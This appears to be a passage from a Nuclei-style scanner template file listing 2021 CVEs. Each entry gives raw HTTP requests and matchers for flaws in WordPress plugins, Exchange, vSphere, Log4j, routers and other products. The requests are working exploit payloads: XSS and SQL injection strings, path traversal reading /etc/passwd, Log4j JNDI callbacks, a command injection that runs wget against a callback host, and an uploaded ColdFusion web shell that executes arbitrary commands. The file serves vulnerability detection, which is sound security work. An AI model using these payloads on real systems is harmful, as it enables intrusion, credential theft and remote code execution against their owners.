wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 - Mod_Proxy SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6- SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo 'CVE-2021-24145'; ?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'CVE-2021-24145')"],"condition":"and"}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site 